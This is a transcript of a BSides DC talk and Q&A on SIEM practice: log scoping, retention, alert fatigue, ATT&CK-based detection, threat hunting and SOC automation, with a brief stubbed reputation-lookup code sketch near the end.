
BSides DC would like to thank all of our sponsors, and a special thank you to all of our speakers, volunteers, and organizers. For anybody who was here for the last talk, thank you; I appreciate anybody who can actually listen to me for two hours, that's an achievement. We're going to talk about SIEMs. Introductions first. Oh, this isn't working. There it is. All right, hi everybody, I'm JR, currently the SIEM architect over at US Census. I also do a lot of SOAR development, so a lot of automation, a lot of SIEM work. I've been using SIEMs for quite a long time; believe it or not, Cisco had a SIEM at one point, Cisco MARS was the name of the tool.

That was your first one, right? My first one. It was horrible, but I did use it. I've actually written one a little bit better than what they had, but it never really became canon or anything like that, just stuff I built around different detection methods. I also tend to golf a lot, as you can tell from my apparel. I just came from a security conference, and I golfed three of the seven days I was over there, so I had a good time and I also learned a lot.

That's out of character, because I'm the manager, the non-technical one, and you're the smart one, but I don't golf and you golf. It's really out of character. I will be a CISO one of these days. Might be just from the golfing. There you go.

So I'm Shaun, I'm the head of the security operations center at Verizon Media. I used to do breach consulting once upon a time, and other proactive services like threat hunting. I'm a SIEM user, and I'm a program builder for SOC, threat hunting, whatever. I also have a podcast called Detections; it's relatively new and kind of cool. I mean, listen, let's plug it. Is it a shameless plug? It absolutely is, but I have no shame. I feel no shame. So, all right,
let's kick off. JR, what is a SIEM? Well, a SIEM is one of the most productive things that can be in your environment for security. It is time consuming and it takes a lot of maintenance, but what it gives you is a place, one, to store all your security-related data. All your log sources, you can put those in the SIEM. Another great thing about a SIEM is that with everything in one place, you can do correlated searches. And he's putting up the different types of SIEMs now. There are lots of SIEMs out there. There's Elastic, who is a sponsor, so we can thank them. We also have FireEye Helix, they're here as well, and Azure Sentinel, they're also here. If you're a sponsor, I will shout you out. Obviously I'm kind of jaded, I'm a Splunk person, but I have worked with other SIEMs, and I've also helped companies with other SIEMs and with best practices for SIEMs in general. The first thing that you have to do with any piece of security technology, not just a SIEM, but especially a SIEM because of the relative complexity of the tool, is know your use case. There are a whole bunch of different ones. You could literally be in security for compliance; we talked about that a little bit last time, but it is a valid use case.
Security operations: maybe your SOC and IR teams are using this, so they're going to need certain logs. Maybe you specifically want to use it for threat hunting, maybe for incident response, maybe for insider threat. That's going to drastically change the type of data that you pull in, how you process and look at that data, and what you're going to build from it. So it's very important to know your use case, and then we start to get into the problems. So let's talk about scoping, JR. Okay, so scope your logs. First problem: basically you need to figure out what you want to alert on, what you want to detect, what you need from your environment. Typically I look at all my security tools, your firewalls, access logs, anything; most of those are a pretty quick checkbox, they're security related. And again, that will be driven by your compliance. Compliance is kind of the easy part, it's an open-book test: it tells you what you will collect, how you'll collect it, and how you will retain it, so you follow those guidelines in creating your solution. You changed the slide there. No, I did not change it. Okay. Also, know your environment. You need to know what's in your environment and what you're going to collect on it. So if you have a lot of AWS devices, you need to understand what to log in AWS and what's relevant on those systems. You also need to know all the security groups and the things that are feeding your SIEM, and who can change those. If those things get changed, that should be treated as a security incident, because it's hindering your security process, so be able to audit and monitor those types of activities. It's also important here to know how you want to go about finding things, your detection strategy. Are you going to go out of the box? Most SIEMs have out-of-the-box content, Splunk has Security Essentials, everyone has their set of base detections. Are you going to use a framework and try to map to that? Are you going to take a hybrid approach, pull in a whole bunch of different things, and build a program like that? We can talk through an example. So this is MITRE ATT&CK; I'm sure everybody has seen it by now because it's been beaten to death, but we're going to use it anyway. It might seem overwhelming, but just a couple of things, or even one log type, can actually get you data that you can use to find a lot of different attacker techniques, and that's beneficial. But you can also go very targeted: what are we seeing, who's being attacked? So if you look at
the Red Canary 2019 threat report, this was great. This thing tells you, hey, PowerShell is number one, scripting is number two; this is how people are getting attacked, and we can talk about specific ways to find each one of those. We can talk about the event IDs for PowerShell, we can talk about how to look for odd port connections, we can talk about different email logging that's beneficial. Now, I definitely did like this Red Canary report, but one thing I noticed was missing off their report: no mention of phishing. How many people get phished with an attachment? It's on there, it's down a little ways, because most of those attacks also include PowerShell these days.
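To make the event-ID point concrete, here is a minimal sketch of a ScriptBlock-logging check, assuming PowerShell Operational events have already been parsed into dicts. Event ID 4104 is where the logged script text lives; the field names and keyword list below are illustrative, not any vendor's schema.

```python
# Minimal sketch: flag PowerShell ScriptBlock logging events (Event ID 4104)
# whose script text contains commonly abused keywords.
# Field names are illustrative, not a real SIEM schema.

SUSPICIOUS_KEYWORDS = ("downloadstring", "invoke-expression", "-enc", "frombase64string")

def flag_powershell_events(events):
    """Return the 4104 events worth surfacing to an analyst."""
    hits = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        script = ev.get("script_block_text", "").lower()
        if any(kw in script for kw in SUSPICIOUS_KEYWORDS):
            hits.append(ev)
    return hits

events = [
    {"event_id": 4104,
     "script_block_text": "IEX (New-Object Net.WebClient).DownloadString('http://x/a.ps1')"},
    {"event_id": 4104, "script_block_text": "Get-ChildItem C:\\Temp"},
    {"event_id": 4688, "command_line": "notepad.exe"},
]
print(len(flag_powershell_events(events)))  # 1
```

In a real deployment the keyword list would come from tested detection content rather than a hard-coded tuple.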
But yeah, it's there. Most people do get attacked by phishing, you're right; I would have expected to see it near the top. So we've talked about that a little bit. Now that we have an idea of what we want and what we're trying to solve for, we really have to focus on data throughput: what are we going to bring in, and how are we going to bring it in? So take it away. Right, so the typical answer is just log everything. Well, that's not possible; it costs too much, way too much, to log all the data sets. And if you don't have an analytic based on a set of data, you really shouldn't be logging it. Licensing is not cheap either. The other thing I often hear is that storage is cheap. Storage is very cheap, but when you need to query that data over a large data set, it gets very expensive, because you're talking about IOPS, you're talking about running searches on cores. Typically, when you're running a search you're using up a core, so even if you have a massive infrastructure, each search you run will take up a core.
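A back-of-the-envelope sketch of that cost math can help prioritize what to onboard. The volumes, retention periods, and per-GB rate below are invented numbers for illustration, not real pricing.

```python
# Rough cost model: daily volume per source times retention times a per-GB rate.
# All numbers are made up for illustration; substitute your own licensing model.

COST_PER_GB = 0.30  # hypothetical dollars per GB stored

sources = {
    "firewall": {"gb_per_day": 50, "retention_days": 365, "has_analytic": True},
    "dns":      {"gb_per_day": 20, "retention_days": 365, "has_analytic": True},
    "netflow":  {"gb_per_day": 400, "retention_days": 90, "has_analytic": False},
}

def storage_cost(src):
    return src["gb_per_day"] * src["retention_days"] * COST_PER_GB

for name, src in sources.items():
    note = "" if src["has_analytic"] else "  <- no analytic uses this; reconsider"
    print(f"{name}: ${storage_cost(src):,.0f}{note}")
```

Even a crude table like this makes the "no analytic, no logging" rule easy to enforce in an onboarding meeting.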
And you also have to look at the IOPS on your back end for your storage solution. If you're storing this data on a purely archival storage solution, it's not going to work; it's not going to give you the IOPS you need to actually get data back out of it. And if you can't turn that data into information, or, like we aim for in the SOAR world, turn data into action, there's no point in collecting the data in the first place. You kind of went over this already, but you also need to understand what's coming in: the firewalls, who manages the firewalls, who to call when you see a data source that's not coming into your SIEM. You need to know who to call, who to wake up, who to put on the horn to remedy that issue. A lot of times I'll call the NOC guys late at night. Even though I'm not working late at night, I'll get an alert and I'll definitely hit them up to figure out, okay, this thing stopped coming in, who can we call to get this remediated instantly? Those are the joys of being on-call. Integrating with other security tools is a topic as well. Definitely, all your security tools need to flow into your SIEM; you want data from all your main security tools, it's part of building your use cases. If you have security tools and you're not getting logs or information from them, what's the point of having them in the first place? Another thing: we all live on the East Coast, and a lot of times I see logs coming in on East Coast time. That's not the way you want your logs coming in. You want everything standardized to UTC, Zulu time. That's how logs need to come in, so we don't have to figure out what happened first because of different timestamps; that's a pain. Granted, I like doing regex, I do regex all day, and I can synchronize time with that, but let's just get it right the first time.
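As a sketch of what that normalization can look like at ingest time: the log format and regex below are made up for illustration, and a production pipeline should use a real time-zone database so DST is handled.

```python
import re
from datetime import datetime, timedelta

# Sketch: rewrite a US-Eastern-style negative UTC offset timestamp to Zulu time.
# The regex matches an invented "YYYY-MM-DD HH:MM:SS -HH:MM" stamp.
TS_RE = re.compile(r"(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) -(\d{2}):(\d{2})")

def to_utc(line):
    m = TS_RE.search(line)
    if not m:
        return line  # leave lines we don't recognize untouched
    local = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    # The offset is west of UTC, so add it back to recover UTC.
    utc = local + timedelta(hours=int(m.group(2)), minutes=int(m.group(3)))
    return TS_RE.sub(utc.strftime("%Y-%m-%dT%H:%M:%SZ"), line)

print(to_utc("2019-10-18 20:30:00 -05:00 DENY TCP 10.0.0.5 -> 8.8.8.8"))
# 2019-10-19T01:30:00Z DENY TCP 10.0.0.5 -> 8.8.8.8
```

Doing this at the source, rather than in the SIEM, is exactly the "get it right the first time" point above.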
Don't put all that extra processing on your SIEM. So let's move on to data storage and retention. Well, again, these are typically driven by your compliance requirements. This is the easy part, the open-book test. They might not tell you exactly how to implement it, but they'll tell you what they're looking for and what you need, so when you're going through an audit you're able to intelligently explain: I'm logging this because this is what the requirement says, this is what we're doing, this is how we're collecting it. If you're able to talk intelligently about it, for the most part you'll be okay during an audit. There is that one auditor who won't care and will say, well, you need to do it his way or you're done, but for the most part, understand what you're doing and understand the why; be able to talk intelligently about what you're collecting, how you're doing it, and what you're doing it for. And data protection: data in the SIEM needs to be protected, and it cannot be modified by any means. So as data ages in a SIEM solution, there needs to be automation that moves that data from hot to warm to cold storage based on how frequently it's searched.
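A sketch of that age-based tiering might look like the following; the day thresholds are illustrative, not a recommendation.

```python
from datetime import date

# Sketch: assign data to hot/warm/cold tiers by age so frequently searched
# data stays on fast storage. Day thresholds are made up for illustration.

def tier_for(event_date, today):
    age_days = (today - event_date).days
    if age_days <= 30:
        return "hot"    # fast storage, searched constantly
    if age_days <= 90:
        return "warm"   # slower, searched occasionally
    return "cold"       # cheap, immutable, kept for compliance

today = date(2019, 10, 19)
print(tier_for(date(2019, 10, 1), today))  # hot
print(tier_for(date(2019, 8, 1), today))   # warm
print(tier_for(date(2018, 10, 1), today))  # cold
```

The key property is that the move between tiers is automated and the cold tier is write-once, so no human can quietly edit history.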
If a person can manually go in there and edit those logs, that's a data integrity issue, and that's a big red flag as far as any kind of audit is concerned. The other thing is scaling. In security we are typically a cost center; we're not looked at as a benefit to the company. So the way I typically go about it is scale up first. You look at your systems and you scale up, get bigger servers. If you're starting with, say, a medium instance in AWS, you scale up, get a larger instance, get something a little bit better, and monitor performance. Once you get that instance right-sized, then you scale out, get multiple instances, and build a cluster, because you need high availability for security tools; that's typically a requirement, and you will get it from most of your compliance requirements. And fast storage: if you can't search it, what's the point of having it? If I'm working an incident and I have ten incidents and this one search is going to take me 30 minutes, it's not going to get done. If you have ten incidents, I think you have other problems, especially concurrently. Well, you already talked about that in your other talk, so I don't need to go there, but yes, the data needs to come back quickly for the analyst.
To actually make a decision, the analyst needs to know: is this malicious or benign traffic? It needs to come back quickly. So let's talk about the analyst a little bit, or let's talk about seeing bad guys. This is what I do for a living; all the stuff he does is way over my head. He used to be an architect. By accident, yeah, for like six months, and I quit because I didn't like it at all. Lack of visibility, this is a big one: if it's not there, we can't alert on it. So one of the things that I've done for a lot of the programs I've built is hold weekly meetings for log requirements, where we work with different teams and set requirements on logs. We say, hey, we're working through this use case, we have this thing that we need, and we need you to have these logs, or we need to start gathering these logs. Then we rack and stack and prioritize them, because it really is a must: if you don't have it, we can't alert on it. If you broaden your detection strategy you can take in multiple log sources, but again, if you don't have them, you can't see it. Lack of context, this is a really, really big one too.
If an alert comes in and it gives you maybe two bullet points, or just a source IP and not a destination, or whatever the case may be, you can do very little with it, and it's going to force you to spend a lot of time continuing forward. And if the data is not parsed, one, you're barely going to be able to alert on it, and two, you're barely going to be able to read it, and it's just going to take more time. Yeah, that's a big thing with me. Data comes in, and you need to have some kind of enrichment process for that data to give context: not just an IP and a hostname, but what kind of system is it? Is it a critical system, a high-value asset? Is it a system that's on 24/7, or a nine-to-five type system? That context needs to be there, available for the analysts, because at the end of the day this is mostly about anomaly detection, trying to find the things that stick out. And that brings you to a big one that security teams everywhere face: not actionable alerting. I've worked in a couple of places, and I'm not going to mention any names, but I will spit out some numbers. I've worked at places where the average time an analyst had to look at each individual alert was 3.2 minutes.
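That enrichment step can be sketched as a simple lookup against an asset inventory. The inventory and field names below are fabricated; in practice this would come from a CMDB or asset-management feed.

```python
# Sketch: bolt asset context onto a bare alert before an analyst sees it.
# The inventory and field names are fabricated for illustration.

ASSETS = {
    "10.1.2.3": {"hostname": "hr-fileserver01", "criticality": "high", "hours": "24/7"},
    "10.1.9.9": {"hostname": "kiosk-lobby", "criticality": "low", "hours": "9-5"},
}

UNKNOWN = {"hostname": "unknown", "criticality": "unknown", "hours": "unknown"}

def enrich(alert):
    ctx = ASSETS.get(alert.get("src_ip"), UNKNOWN)
    return {**alert, **{f"asset_{k}": v for k, v in ctx.items()}}

alert = enrich({"rule": "odd outbound port", "src_ip": "10.1.2.3"})
print(alert["asset_criticality"], alert["asset_hours"])  # high 24/7
```

The same lookup pattern works for user context (full name, section, email) so the analyst never has to decode a raw username.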
That was their workflow: 3.2 minutes to make a determination on whether that got escalated or was non-malicious. The majority of those were things that they shouldn't even have to look at, which leads into alert fatigue, which I'm pretty sure is the next bullet point. But for half of the things that they looked at, there was no action they could take; they could either forward it to the next person or close it. In that case, what's their job? Is their mission to be there to forward something to the next person, or is their mission to be there to find bad guys? So I always loop back to understanding your mission and sticking to your mission as being very important in that context. Then we talk about alert fatigue, and alert fatigue is a big one too, same thing, 3.2 minutes. The problem is that everybody talks just about fidelity, and I've been on a kick for four years to try to move away from fidelity alone and look at three categories: fidelity, frequency, and intent. How bad is this in my environment, how often does it fire, and then what's my ratio of true positive, or investigable, to false positive? It leads you to a couple more false positives, but to a much better and more holistic detection strategy, and it tends to mean analysts get burnt out a little bit less. It's also very hard to make the fidelity-alone argument, because oftentimes your breach detection is going to be in the low-fidelity stuff at the bottom. Alert fatigue will kill a security program, because people let things go that should be investigated, or that should get more follow-up; instead of escalating, they just close that notable. Hey, we're vendor-agnostic here, don't use the word notable. Oh, event. You're right. And that's the thing: you get so sick of seeing the same thing over and over again that you're going to move on. And I find it really interesting when you talk about security programs: the SOC, the people who typically handle the output of the SIEM, are oftentimes the most untrusted part of any security organization, and nobody ever listens to them, and that sucks. Because of that, the fatigue builds, because they don't have any ability to fix it. If you empower the individuals who actually have to do this work day in and day out to fix things, it solves the problem. But that's not what this talk is about; that's a different soapbox. So let's talk about the alerting strategy, and we brought this up a little bit earlier. I'm a big believer in a hybrid alerting strategy: taking things from multiple places, feeding those into your SIEM, and using them to your advantage. You've got a whole host of tools.
We're going to try to stay pretty open, but shout out to Moloch, because it's awesome and my company makes it. Carbon Black, CrowdStrike, whatever it is that you have, you can feed all that data into your SIEM, and you can feed information and context in there, and that can give you a lot. Then you've got all of your intel, and intel can be really valuable when paired with other things. And then you can take a framework and potentially build to that framework. Again, I know this one's been beaten to death, but it works, so we've used it. So we can take this as a use case, and one thing worth mentioning: say I have CrowdStrike or Carbon Black and a whole bunch of data. I can send all of the logging data, not just the alerting, over to a SIEM. I can create custom content off of that, I can look for intelligence across it; there are a lot of things you can do once you start to centralize that data in one place, and you're no longer reliant on just a vendor's detections. So I stole this directly from MITRE, who did an APT3 evaluation plan, because it made this really easy. They evaluated a couple of vendors, testing for these things across the MITRE ATT&CK framework. I realize the slide is very small; we will make the slides available. So we have CrowdStrike in this use case, and this is what CrowdStrike caught from that section; this is pure detection that came up to an analyst. That can tell us a couple of things. We have some intel that can give us more of the story: this is general intel on APT3, it gives us hashes, it gives us call-outs, it gives us C2. That's not necessarily technique-specific, but we'll be able to detect some stuff in the general tactics or techniques. So where are the gaps? What have we missed? What if they switch something? If they switch an IOC, if they stop using PowerShell, what don't we see about that general attack path? Well, we can color some of it in. We can look for suspicious command-line interface use, we can look for scheduled tasks, we can look for new creations of accounts and services. There are a lot of places where we can go: this is what we know, this is what we know we will detect, and now we can start to build a methodology around covering those gaps and adding new stuff to make sure that we find evil through that use case. Do you want to talk on that one a little bit?
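That gap exercise can be kept honest with even a trivial bit of bookkeeping. The technique IDs below are real ATT&CK IDs, but the coverage sets are invented for illustration.

```python
# Sketch: map an attacker profile's ATT&CK techniques against what your
# detections already cover, and list the gaps. Coverage sets are invented.

attacker_profile = {
    "T1059.001": "PowerShell",
    "T1053": "Scheduled Task/Job",
    "T1136": "Create Account",
    "T1055": "Process Injection",
}
covered_by_edr = {"T1059.001"}
covered_by_custom_content = {"T1053"}

def gaps(profile, *coverage_sets):
    covered = set().union(*coverage_sets)
    return {tid: name for tid, name in profile.items() if tid not in covered}

for tid, name in sorted(gaps(attacker_profile, covered_by_edr,
                             covered_by_custom_content).items()):
    print(tid, name)
```

What matters is not the data structure but the habit: every new detection or intel feed updates a coverage set, and the gap list drives the next round of content.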
I'll take it. So it's not much different when we go into hunting, although a couple of things change. When you're in hunting and IR, you care much less about alerts and much more about data retention. What happens if we detect a breach a year afterward? Does anybody think it's uncommon to detect a breach a year after it happens? That's about the average. So do you have a year's worth of the necessary logs that you'll need to investigate it? Who here has a year's worth of full pcap, anybody? Is that possible? I've seen it before. Was it a three-person company? Three-letter agency. Okay. But what do you have, and how long do you have it for? That's really important, and you don't have to store everything; you can get a lot from some metadata. I mean, Bro is pretty lightweight, you can keep that forever, and you can get a lot from it. Searching through big data: you're looking at bigger data sets from a hunting perspective. You're going, I want to see all PowerShell, or I want to see all unsigned binaries that are 64 to 75 kilobytes. I realize that's very specific, but I did that on a breach case. That brings up the importance of making sure that your data is indexed and parsed appropriately.
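The size-band hunt mentioned above reduces to a filter over file metadata. This assumes the signed flag and size were already collected, for example from EDR telemetry; the records are fabricated.

```python
# Sketch: hunt for unsigned binaries in a specific size band (64-75 KB),
# per the breach-case example above. Records are fabricated.

def hunt_unsigned(records, low_kb=64, high_kb=75):
    return [r for r in records
            if not r["signed"] and low_kb * 1024 <= r["size_bytes"] <= high_kb * 1024]

records = [
    {"path": "C:\\Users\\x\\a.exe", "signed": False, "size_bytes": 70 * 1024},
    {"path": "C:\\Windows\\notepad.exe", "signed": True, "size_bytes": 70 * 1024},
    {"path": "C:\\Users\\x\\big.exe", "signed": False, "size_bytes": 900 * 1024},
]
for r in hunt_unsigned(records):
    print(r["path"])
```

The filter itself is trivial; the hard part, as the talk says, is having the metadata retained, indexed, and parsed before you need it.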
It's also important to make sure there's training on how to use the tool and its query language effectively. I'm personally a big fan of index=*. I had to. But that's just me. Lack of visibility, that's another one, and we kind of talked about this earlier: more than just an alert, you want all the visibility you can get in an IR or hunt case, because you don't know where they came in, you don't know what they went to, you don't know where they pivoted from, none of that. So the more visibility you have, the better. Now, it does have to be realistic, because you can't log everything, and some data you just don't need, but it makes sense, before you even start doing this stuff, to prioritize what log types and sources you need and how long you're going to store them. There's a lot of setup that goes into a tool like this before you get to do all the cool stuff, and a lot of people skip that part. Yeah, and another great thing: for one of the hunts we did, we looked for new user agent strings, and that was wildly successful for one of our teams. So think outside the box on things like that. If we come back to this same use case, same attacker scenario, same everything:
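The new-user-agent hunt is just a set difference against a baseline; the baseline and traffic below are toy data.

```python
# Sketch: surface user agent strings never seen in the rolling baseline.
# Baseline and today's traffic are toy data.

baseline = {
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "curl/7.58.0",
}
todays_agents = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "python-requests/2.22.0",
    "curl/7.58.0",
]

new_agents = sorted(set(todays_agents) - baseline)
print(new_agents)  # ['python-requests/2.22.0']
```

In practice the baseline would be a rolling window of proxy logs, and the novel agents would be triaged, not auto-alerted.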
We know what we can detect, we've built some other detections for it, we know what we would see. Now let's add a hunt. Last time this is what we got; this is what we can hunt. And I've missed some, I guarantee I've missed some, so don't hold me to it, but these are just some quick things that we can hunt. Maybe we have a very specific PowerShell detection, but we want to look for PowerShell overall, or command-line interface use, or scheduled tasks, or new services, or process injection. These are all things where we can say, okay, my hunt rotation is coming up, what do I want to look for? Let me pick a use case, let me form my hypothesis based on that use case, and then let me start testing different things and looking for things that would fit that attacker pattern. That can become really beneficial, and then you can pivot from it and say, hey, I found something really cool; let's see if we can fine-tune it and turn it into a detection, so that we have it long term and not just for one month until next year when we do it again. Here are some cool log sources that are really beneficial, that I've found doing IR engagements, from a Windows perspective. If anybody wants to take a picture of that, feel free.
It's all stuff that we've looked at and stuff that we've used, not just for detection; in IR we wanted to see this stuff because we'd find a lot of bad there. So that brings us to moving past the basics. We've got this set up, we've got a strategy, we've built something. What else can you do? Yeah, I definitely like to automate the routine processes that your SOC normally does. I don't like the idea of analysts manually doing things like nslookups, LDAP lookups, creating tickets, sending emails. I want to automate all of those processes, or at least automate the framework, so that stuff just pops up, the analyst sees it, adds some notes, and sends it on its way, saving their time. Because, like I said, we have a shortage of people doing this kind of work, and it's not going to get any better. Granted, it might be a self-inflicted wound, but that's another topic for another day; that's the state we live in. So I'm a big believer in automation in the security process. It allows the analyst to be an analyst, or a detective, the person who goes and finds things, and lets them focus on what they should be doing rather than: oh man, this thing happened, I've got to open a ticket with that team to fix it, I've got to open a ticket for myself to track it internally, I've got to go run these five queries. It removes the minutiae, which is really, really nice, and it's something I'm glad to see coming up, so to speak, and getting more popular. I'm very excited to see some of the platforms that do this get way more mature over time.
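One of those routine lookups can be sketched like this. The alert shape is made up; the reverse-DNS call is standard library, wrapped so a failed lookup doesn't break the pipeline.

```python
import socket

# Sketch: do the reverse-DNS step for the analyst automatically and attach
# the result as a note on the alert. Alert fields are made up.

def auto_enrich(alert):
    notes = []
    ip = alert.get("dest_ip")
    if ip:
        try:
            hostname = socket.gethostbyaddr(ip)[0]
        except OSError:
            hostname = "no PTR record"
        notes.append(f"reverse DNS for {ip}: {hostname}")
    alert["analyst_notes"] = notes
    return alert

enriched = auto_enrich({"rule": "possible beaconing", "dest_ip": "127.0.0.1"})
print(enriched["analyst_notes"][0])
```

A SOAR platform strings dozens of steps like this together; the point is that the analyst reads the note instead of running nslookup.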
Next one: AI and machine learning applied to data. I'm not going to sit here and pretend to be an expert on either of those topics. I will say that during a lot of the time I spent as a consultant, we had a drinking game for whenever this came up in a vendor call. On the use cases: we had a customer that was able to use machine learning to predict when drives were going to fail. Not a great security use case, and you're not saving a ton of money, but it was predictive; you could order drives before a drive actually failed and swap it out before you had a down drive. And there are some really good behavioral analytics that come with this, and you can apply a lot of it there. As you start to look into some of the user behavior analytics tools that use this: this person never, ever logs in from this location at this time, and we've got a year's worth of data to support that. That can be really interesting and really beneficial. So I think some of the AI and ML stuff will move toward that, and toward things like detecting exfiltration; it becomes the anomaly detection side of the house. And an anomaly is honestly probably one of the best ways to find bad guys; atomic indicators are much harder.
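The login-location idea reduces to a baseline of (user, location) pairs. Real UBA products weigh far more signals; the history here is fabricated.

```python
from collections import defaultdict

# Sketch: flag a login from a (user, country) pair never seen in the baseline.
# History is fabricated; real UBA models also weigh time-of-day, device, etc.

def build_baseline(history):
    seen = defaultdict(set)
    for user, country in history:
        seen[user].add(country)
    return seen

def is_anomalous(baseline, user, country):
    return country not in baseline.get(user, set())

history = [("alice", "US")] * 200 + [("bob", "US"), ("bob", "CA")]
baseline = build_baseline(history)
print(is_anomalous(baseline, "alice", "UA"))  # True
print(is_anomalous(baseline, "bob", "CA"))   # False
```

The year's worth of data mentioned above is what makes the baseline trustworthy; with a week of history, everything looks anomalous.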
Behavioral analytics we kind of already covered, and then the last one is SOAR, which is essentially automation of routine processes. Like I said, I was busy with the other presentation, so I didn't set the transitions right, apparently. Fair enough. But you have a quick story on behavioral analytics? You typically don't even need really fancy tools to do this kind of stuff. For one customer, they had HBSS fully implemented, and I was tagged to do some insider threat work. Tag, you're it. So I looked at something they had in place and figured, okay, let's just take a look at removable media. So I wrote a short Python script, basically taking the people who were authorized to burn media and the people who were actually burning media, and whatever that delta was, I sent it to the HBSS team and let them deal with it. What happened was I actually got emails; they were pretty upset that I was able to find people burning removable media with HBSS fully installed and implemented. Now, was it a failure in group policy, or was it HBSS itself? It doesn't really matter; the thing is that we found it, and now we need to fix it. So trust but verify; I've got to stay in security. Look at problems and give them a second look.
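The script described above boils down to a set difference; the names and event format here are fabricated stand-ins.

```python
# Sketch of the removable-media check: users actually burning media minus
# users authorized to, with the delta handed off for follow-up.
# Names and event format are fabricated.

authorized = {"asmith", "bjones"}
burn_events = [
    ("asmith", "2019-10-01"),
    ("cdoe", "2019-10-02"),
    ("cdoe", "2019-10-04"),
]

actual_burners = {user for user, _ in burn_events}
unauthorized = sorted(actual_burners - authorized)
print(unauthorized)  # ['cdoe']
```

Two sets and a subtraction: that's the whole "trust but verify" check, which is the point of the story.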
Don't assume things are working as they should. Let's take a moment to give special thanks. I don't think we're going to read them all out, but they do exist, and this list gets longer every time we do this. Thanks to all the people who proofread this, helped us out with it, or were inspirations for it, and thanks to everybody who came to watch; we appreciate it. Do you have any final comments on the topic, or pieces of advice for SIEM users everywhere? If you are a SIEM user, I'll definitely say look at some SOAR solutions. It's not built to replace your job; it's going to make your job easier for you. So don't fear the SOAR, contrary to the dashboards they put up whenever you buy one, the ones that say you've saved this much money by automating, so you can fire this many people. You can easily hide those dashboards, like I've done. No, I would agree, automation I think is the way we're going, it really is. But the other one is: just have a mission statement, and every question that you ask should be based around that mission statement. Does it meet the mission? It will make what you do so much easier, so you can avoid being a death-by-a-thousand-cuts shop, doing a thousand things that you shouldn't be doing and not actually being able to focus on what you want.
Questions, thoughts, comments, concerns, gripes? Come up and grab the mic, or I guess I can just jump down. I'm cool with that. Here you go. My question is for JR. You said that seeing the nslookups and the LDAP lookups, you didn't want to see that, because it's kind of what I would think of as an anti-pattern. So anything more there? Anti-patterns like buying the wrong kind of fast storage, or, once you've got the basics down and you're ready to level up, any mistakes there? You can limit it to three, I guess. Okay, so on the anti-pattern: I think I get it. It's not that he didn't want to see that, it's that he didn't want the analyst manually doing it. That data should already be there, presented to the analyst. An analyst should not get an alert with just an IP address for something that's internal. For the most part, our usernames are kind of coded and not your full name; the analyst should get the full name, what section the person is in, and their email address. That context should all be there when the alert fires. You're very intimidating from down here, I guess.
Yeah. Well, I'll say what's next: let the analysts have more time to actually work on incidents, to research, research, research the events, look at trends and patterns, work with your threat intel team, and not just take everything at face value. Let the analysts make decisions. Critical thinking is important in this industry. If you're training them to just check boxes, they see, oh well, this is benign, but it's not actually: they see something on VirusTotal that isn't flagged malicious and they assume it's not malicious. Well, what's happening on our host? What's happening on our infrastructure? What process is making that call? You want analysts to think that way and look deeper into the incident that's assigned to them. You said it way better than I did. Yeah, that's right. So one of the things that I do programmatically, and it's time dependent, so we're always trying to get more time, is I dedicate 25% of analyst resources to hunting exercises, in a monthly rotation that includes things like working on tuning content, which helps build them, and research projects where they can go look for new ways to find badness, with an outcome for each one of those projects. I try to keep that 25% of time, so everything I can shave off gives my analysts more time.
More time to do things that help build us, rather than just doing the stuff that happens day in and day out. Question: so if you add context, it might give you information from other datasets that you can pull in for additional context? That's absolutely correct, yes. Yeah, so you were talking about your use case, and you had a bunch of different options up there. My question is: if you're a small shop and you've got multiple needs there, how much trouble are you going to find yourself in if you're trying to use this for multiple use cases? Aren't you going to shoot yourself in the foot with all the data you're trying to deal with? In most cases, I don't think so. As a small shop you're realistically going to have less data, so it does become what you can afford in a lot of ways: can I afford this, can I afford that? You have to prioritize a little bit based on what your cost model is and what you're willing to pay. But take that equation out of it: I've been in shops, and I'm in one now, where we have multiple different teams and use cases that run out of the same tool. We tag things a little bit differently, we collect things a little bit differently, and we have a few tension points every now and again, of going, I want this stuff to go away; well, I need that. That will happen a little bit, and then you weigh the risk of it going away versus needing it, and you work together and get there. In most cases you're probably going to have more than one use case, but each team should only approach the tool from the use case that they need, and then work with the other teams and say, well, this is what I need, what do you need, and build that plan together. There you go.
your SOC more efficient, but I also believe that junior analysts can really learn on the job by doing that more simple work. So how do you look at the future of training and onboarding junior analysts, in growing senior enough to automate, or to decide what to automate? So I genuinely tend to hire junior analysts because I like to build people from the ground up, but teaching them how to do an nslookup isn't really teaching them anything of high value. Teaching them how to think like a detective, approach the problem, and go look for the other things is. I have a saying in any shop I've ever been in, and that's that I don't run a paint-by-numbers SOC. There's no step-by-step. You'll have guidelines, but you use your brain. So when I bring somebody in, we'll walk them through the process: this is what you can usually look for. Then we move past that and go, okay, you saw this thing, you can go look here, here, and here, and we figure it out. So I don't think anybody's talking about gating each step of the investigation process; in that case you don't really need a person. We are talking about giving them more time to focus on those investigative steps, the deeper investigations, and that learning opportunity, which is where I think they'll get real value, the critical thinking side of it, as opposed to, I have to run nslookup every time or check VirusTotal 500 times a day.
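As a sketch of what shaving off those rote lookups can look like, here is a hypothetical cached reputation check. The `_fetch_reputation` stub below stands in for a real API client such as VirusTotal's; none of these names come from an actual product:

```python
# Sketch of taking the rote lookups off the analyst's plate: wrap a
# reputation lookup (a stub here; a real playbook would call out to
# something like the VirusTotal API) in a cache so each indicator is
# fetched once, instead of hundreds of times a day by hand.
from functools import lru_cache

def _fetch_reputation(indicator: str) -> str:
    # Stub standing in for a real API call.
    known_bad = {"evil.example.com"}
    return "malicious" if indicator in known_bad else "unknown"

@lru_cache(maxsize=4096)
def reputation(indicator: str) -> str:
    return _fetch_reputation(indicator)

for _ in range(500):                 # 500 alerts referencing the same domain...
    verdict = reputation("evil.example.com")
print(verdict, reputation.cache_info().misses)  # ...cost one underlying lookup
```

The point isn't the caching trick itself; it's that the machine absorbs the repetition so the analyst's time goes to the investigation, not the lookup.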
